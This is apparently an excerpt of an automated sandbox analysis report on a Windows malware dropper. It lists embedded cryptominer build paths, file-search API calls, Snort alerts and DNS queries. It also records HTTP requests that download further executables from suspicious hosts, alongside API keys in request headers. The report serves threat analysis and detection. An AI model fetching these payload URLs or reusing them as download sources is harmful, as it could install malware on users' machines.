                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpFile created: C:\Users\user\AppData\Local\Temp\Setup Log 2022-10-04 #001.txtJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmpRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1Jump to behavior
                Source: l39HA25qjw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\vladimir\projects\massivesdk\cmake-build-vs16-x64-embedded\bin\RelWithDebInfo\xmrBridge.pdb// source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wextract.pdb source: l39HA25qjw.exe, l39HA25qjw.exe, 00000001.00000000.42202825202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Fuck.exe.pif, 00000014.00000003.42873695221.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLL\XMRCLBridge.pdbee!GCTL source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: wextract.pdbGCTL source: l39HA25qjw.exe, 00000001.00000000.42202825202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Fuck.exe.pif, 00000014.00000003.42873695221.0000000003E3E000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLL\XMRCLBridge.pdb source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: ads.pdbarea.com source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_master\core\mining\gpu\external\SysGpuInfoEx\x64\RelDLL\SysGpuInfoEx.pdbKK source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_master\core\mining\gpu\external\SysGpuInfoEx\x64\RelDLL\SysGpuInfoEx.pdb source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLLNV\XMRCLBridgeNV.pdb source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\Users\vladimir\projects\massivesdk\cmake-build-vs16-x64-embedded\bin\RelWithDebInfo\xmrBridge.pdb source: FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: R:\massivesdk_gpu-miner-extern\XHV\XMRCLBridge\x64\ReleaseDLLNV\XMRCLBridgeNV.pdbMM!GCTL source: FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\l39HA25qjw.exeCode function: 1_2_00402395 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00402395
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECE27D lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,13_2_00ECE27D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECD72C FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00ECD72C
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ECDA5F FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,13_2_00ECDA5F
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00EDA37B FindFirstFileW,Sleep,FindNextFileW,FindClose,13_2_00EDA37B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED64E7 FindFirstFileW,FindNextFileW,FindClose,13_2_00ED64E7
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00E9C522 FindFirstFileExW,13_2_00E9C522
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED71DF FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,13_2_00ED71DF
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED713E FindFirstFileW,FindClose,13_2_00ED713E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED9E92 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00ED9E92
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 13_2_00ED9FED SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,13_2_00ED9FED
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ECE27D lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00ECE27D
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00EDA37B FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00EDA37B
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED64E7 FindFirstFileW,FindNextFileW,FindClose,19_2_00ED64E7
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00E9C522 FindFirstFileExW,19_2_00E9C522
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED71DF FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00ED71DF
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED713E FindFirstFileW,FindClose,19_2_00ED713E
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ECD72C FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00ECD72C
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ECDA5F FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00ECDA5F
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED9E92 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00ED9E92
                Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pifCode function: 19_2_00ED9FED SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_00ED9FED

                Networking

                barindex
                Source: TrafficSnort IDS: 2014702 ET DNS Non-DNS or Non-Compliant DNS traffic on DNS port Opcode 8 through 15 set 192.168.11.20:60830 -> 34.142.181.181:53
                Source: TrafficSnort IDS: 2027757 ET DNS Query for .to TLD 192.168.11.20:53457 -> 1.1.1.1:53
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 8888
                Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49843
                Source: DNS query: www.mxnzvc.xyz
                Source: DNS query: www.savesucpnys.xyz
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 5
                Source: Malware configuration extractorURLs: https://dfgrthres.s3.eu-west-3.amazonaws.com/aysdg930
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: global trafficHTTP traffic detected: GET /apps/config?productId=adblockfast&distId=marketator&anonId=11389406-0377-47ed-98c7-d564e683c6eb HTTP/1.1Host: api.joinmassive.comAccept: */*x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                Source: global trafficHTTP traffic detected: GET /dist/match?productId=adblockfast&distId=marketator&downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&installerSessionId=113894061664863815&pid=767&installType=installPath HTTP/1.1Host: api.joinmassive.comAccept: */*x-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrof
                Source: global trafficHTTP traffic detected: POST /telemetry/ping?source=app&productId=adblockfast&distId=marketator&env=prod HTTP/1.1Host: api.joinmassive.comAccept: */*Content-Type: application/jsonx-api-key: vdHv1LwOhm9xuH340hel68pg6cW5X5T96CjMZrofContent-Length: 262
                Source: global trafficHTTP traffic detected: GET /sdk/config?stage=prod&uid=4c6fdfc9-de78-4899-8dc6-365b9c5db799 HTTP/1.1x-api-key: 5oydibnqoD6t310DYGMUh7y4e2WWpHvvapKEL4pFConnection: CloseHost: api.joinmassive.com
                Source: global trafficHTTP traffic detected: GET /postback/adblockfast/marketator?downloadDate=2022-10-04T06%3A10%3A07&anonId=11389406-0377-47ed-98c7-d564e683c6eb&pid=767 HTTP/1.1Host: api.joinmassive.comAccept: */*
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Oct 2022 05:10:22 GMTContent-Type: application/octet-streamContent-Length: 1503744Last-Modified: Sat, 01 Oct 2022 10:16:48 GMTConnection: keep-aliveETag: "63381390-16f200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 06 37 0d 6b 42 56 63 38 42 56 63 38 42 56 63 38 56 3d 60 39 52 56 63 38 56 3d 66 39 fb 56 63 38 10 23 66 39 13 56 63 38 10 23 67 39 50 56 63 38 10 23 60 39 58 56 63 38 83 23 6b 39 43 56 63 38 56 3d 67 39 5a 56 63 38 56 3d 65 39 43 56 63 38 56 3d 62 39 55 56 63 38 42 56 62 38 bb 56 63 38 83 23 67 39 45 56 63 38 83 23 66 39 53 56 63 38 83 23 9c 38 43 56 63 38 42 56 f4 38 43 56 63 38 83 23 61 39 43 56 63 38 52 69 63 68 42 56 63 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 90 13 38 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 9e 11 00 00 9a 05 00 00 00 00 00 63 7b 0e 00 00 10 00 00 00 c0 11 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 17 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 7a 14 00 a0 00 00 00 00 20 15 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 16 00 b4 82 00 00 70 fa 13 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 fb 13 00 18 00 00 00 a8 fa 13 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 11 00 0c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 41 11 00 00 10 00 00 00 42 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 6c 6a 68 73 6b 62 73 8a 5a 00 00 00 60 11 00 00 5c 00 00 00 46 11 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d2 cb 02 00 00 c0 11 00 00 cc 02 00 00 a2 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 77 00 00 00 90 14 00 00 2e 00 00 00 6e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6c 6a 68 73 6b 62 73 50 00 00 00 00 10 15 00 00 02 00 00 00 9c 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 d0 01 00 00 20 15 00 00 d0 01 00 00 9e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 b4 82 00 00 00 f0 16 00 00 84 00 00 00 6e 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: global trafficHTTP traffic detected: GET /adblockfast/marketator/windows/AdblockInstaller.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.computewall.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /files/pe/pb1105.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mnh.ajn322bb.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gamexyz/3004/random.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a.dowgmea.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /gamexyz/3004/0c31f204fbfc2138ce1b01698bd18c18.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: b.dowgmeb.com
                Source: global trafficHTTP traffic detected: GET /search_hyperfs_213.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 2jhbdhjfsdf2.monsterConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /attachments/982710296206536716/1020079721150685314/NotGraduate.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cdn.discordapp.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /setup.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: cf43570.tmweb.ruConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: www.icodeps.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /1nRWH4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 282Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 282Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 17962Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 2746Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 254Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /down/u4vYmgIN4sqk HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.mxnzvc.xyz:8888Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /3004.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
                Source: global trafficHTTP traffic detected: GET /logo.png HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: xv.yxzgamen.com
                Source: global trafficHTTP traffic detected: GET /mp3studios6/mp3studios_6.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.savesucpnys.xyzConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /mp3studios_6.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.savesucpnys.xyzConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 104.21.34.132 104.21.34.132
                Source: global trafficTCP traffic: 192.168.11.20:49843 -> 103.136.42.153:8888
                Source: Fuck.exe.pif, 00000014.00000002.47256501864.0000000000B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.33/files/Hadi.config.CfgEncFile
                Source: Fuck.exe.pif, 00000014.00000002.47265188405.0000000002740000.00000040.00001000.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000002.47265513088.0000000002756000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.33/files/Hadi.config.CfgEncFileMZ
                Source: Fuck.exe.pif, 00000014.00000002.47256501864.0000000000B40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://109.206.241.33/files/Hadi.config.CfgEncFileP
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42646108264.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42716979665.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                Source: l39HA25qjw.exe, 00000001.00000003.42210428960.00000000068C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                Source: Fuck.exe.pif, 00000014.00000002.47259260074.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42813995024.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42805765241.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42872737446.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42775922312.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42782434369.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42858765124.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42646108264.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42716979665.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42870285384.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42808030662.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp, Fuck.exe.pif, 00000014.00000003.42764417732.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: Fuck.exe.pif, 00000014.00000003.42645989281.0000000000BB9000.00000004.00000020.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42719778859.000000007FE38000.00000004.00001000.00020000.00000000.sdmp, FagLhQ, 00000015.00000003.42710063412.000000000279C000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43332827358.0000000003ED5000.00000004.00001000.00020000.00000000.sdmp, FagLhQ.tmp, 00000016.00000003.43312503428.0000000003A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
